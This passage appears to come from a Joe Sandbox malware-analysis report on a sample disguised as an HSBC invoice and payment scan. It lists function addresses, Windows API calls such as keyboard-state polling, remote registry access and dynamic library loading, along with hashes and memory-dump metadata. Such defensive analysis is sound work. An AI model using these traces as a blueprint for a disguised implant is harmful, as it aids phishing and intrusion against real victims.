                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                    • Instruction ID: 7e78fcbf33e1475e46a402463bf8eed604b02b093ea56b18f8072c726690bfc7
                    • Opcode Fuzzy Hash: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                    • Instruction Fuzzy Hash: 8F21A17560538DABDB209F6A9C04A9AB7E8BF55734F201619FCE0E32D0D7709841CB51
                    Function 00EEAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EEAF13
                    • __swprintf.LIBCMT ref: 00EEAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0F910), ref: 00EEAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                    • Instruction ID: c3fb27b88f8b41c5225471ff0ca75939c1a5fd4ccb51396a7169a59681b0ffa2
                    • Opcode Fuzzy Hash: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                    • Instruction Fuzzy Hash: 12216230A0010DAFCB10EB65CC85DAE77F8EF89704B0440A9F509AB252DB71EA45DB61
                    Function 00EDA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00EDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                      • Part of subcall function 00EDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                      • Part of subcall function 00EDA37C: GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                      • Part of subcall function 00EDA37C: AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                    • GetFocus.USER32 ref: 00EDA554
                      • Part of subcall function 00EDA3C5: GetParent.USER32(?), ref: 00EDA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDA59D
                    • EnumChildWindows.USER32(?,00EDA615), ref: 00EDA5C5
                    • __swprintf.LIBCMT ref: 00EDA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                    • Instruction ID: 133408428f01606c98dfa09103af3870ba72b2829ec405158b394087af317661
                    • Opcode Fuzzy Hash: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                    • Instruction Fuzzy Hash: A611A871500208BBDF107F64DC85FEE37B9EF49700F045076B91C7A192CA759A469B75
                    Function 00EE2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EE2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                    • Instruction ID: 77b9634dc3a599a4dd8d3fe8ed5ca6c7ecf31cb953dd0d7d47b583d626b8445f
                    • Opcode Fuzzy Hash: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                    • Instruction Fuzzy Hash: D9115B7190010D8FCF10EFA5D8914EEB7F4FF5A304F1094A9D995BB292EB32A90ADB50
                    Function 00EF8F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0F910), ref: 00EF903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0F910), ref: 00EF9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EF91EB
                    • SysFreeString.OLEAUT32(?), ref: 00EF9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                    • Instruction ID: 1251dfc0cfa93239cc860a7c661e615617e91a2e7bb69b446d71ce18ec708f4d
                    • Opcode Fuzzy Hash: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                    • Instruction Fuzzy Hash: 16F11971A00109EFDB14DF94C888EBEB7B9FF89314F109099FA55AB251DB31AE45CB50
                    Function 00EFEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EFEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EFEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EFF07E
                    • CloseHandle.KERNEL32(?), ref: 00EFF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                    • Instruction ID: ebaeab9b44e2961e80318113dcfd8af52e47371c292b078884194fc78701563f
                    • Opcode Fuzzy Hash: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                    • Instruction Fuzzy Hash: 7F815271A043019FD724EF24CC86B7AB7E5AF88710F54981DF99EE7292DB70AC418B51
                    Function 00F002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F003C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00F0043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                    • Instruction ID: db42fe1e50867a36d1d2918625fbe5f271b727f366d803d90b3d7470b575c10c
                    • Opcode Fuzzy Hash: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                    • Instruction Fuzzy Hash: 04515931608204AFD714EB64CC81F6AB7E8FF84714F04892EF59997292DB31E905EB52
                    Function 00EFDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EFDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDD35
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                    • Instruction ID: cdfa1ede65c6af051dba894e73189fe9d8be354e1c22a6218a72f8fe4e394b8c
                    • Opcode Fuzzy Hash: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                    • Instruction Fuzzy Hash: E0513735A04209DFCB00EF68C8849ADFBF5FF59314B0991A9E919AB312DB31ED45CB91
                    Function 00EEE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EEE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EEE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EEE8F2
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EEE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EEE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: d50cb6dc04e4c0bece30e994e37cd1fe29f88004a92bbf9b2cf4df7cb9ec03b5
                    • Instruction ID: 58110e6377c354a6ea7e8f570cf878371f3b0ded508085281421e0d3fcbf09eb
                    • Opcode Fuzzy Hash: d50cb6dc04e4c0bece30e994e37cd1fe29f88004a92bbf9b2cf4df7cb9ec03b5
                    • Instruction Fuzzy Hash: E251F935A00209DFCB15EF65C9819AEBBF5EF49314B189099E849BB362CB31ED11DB50
                    Function 00F0A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                    • Instruction ID: 0ab2bc54c0819d92d495cc0d06c95e17a474a9bb4b16e956708b4ddae732697f
                    • Opcode Fuzzy Hash: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                    • Instruction Fuzzy Hash: 7141DF39D00308AFD720DB28CC48FA9BBA9FB09320F154265F855E72E1D771AD41FA52
                    Function 00E82344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E82357
                    • ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E82399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                    • Instruction ID: 4390626a800e17e73e4541dfc1aed5ab5ab3f2213b4aac7b7e0e8ed9409accc9
                    • Opcode Fuzzy Hash: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                    • Instruction Fuzzy Hash: E341813550851AFBDF159FA8CC44AEABB74FB05324F20431AF92CA22A0C7355954EB91
                    Function 00ED6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED69A9
                    • TranslateMessage.USER32(?), ref: 00ED69D2
                    • DispatchMessageW.USER32(?), ref: 00ED69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                    • Instruction ID: dc1cbcda97e51cf8ddf16e9405a11e67b8895535ff01075779f16adcf92174e4
                    • Opcode Fuzzy Hash: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                    • Instruction Fuzzy Hash: B931E57150024AAEDB20CF74CC84BF67BA8EB13318F105167E825E22A1D775988BE791
                    Function 00ED8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00ED8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00ED8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ED8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00ED8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ED8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                    • Instruction ID: 335f6ba12df353ac23dce7168f7a261098b1a58f6b98aab3d3d799a1112c6bd7
                    • Opcode Fuzzy Hash: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                    • Instruction Fuzzy Hash: 3031C07160021DEFDB14CF68DE4CA9E7BB6FB04315F10422AF925E62D0C7B09915DB90
                    Function 00EDB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00EDB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDB742
                    • _wcsstr.LIBCMT ref: 00EDB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 3ff5d37ccd05865ad7512bb925ad7b89c04196604e55652bb709c98f4b40307e
                    • Instruction ID: b91b3a98a8b55abd6a8b405a5cf0e907f2e2bb2d274b7d07a0fb2b775d1bf655
                    • Opcode Fuzzy Hash: 3ff5d37ccd05865ad7512bb925ad7b89c04196604e55652bb709c98f4b40307e
                    • Instruction Fuzzy Hash: FE21D731204204FBEB255B399C49E7B7B9CEF4A760F01516BF805EA2A1FB61DC429660
                    Function 00F0B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0B44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0B471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0B489
                    • GetSystemMetrics.USER32(00000004), ref: 00F0B4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EF1184,00000000), ref: 00F0B4D0
                    Memory Dump Source
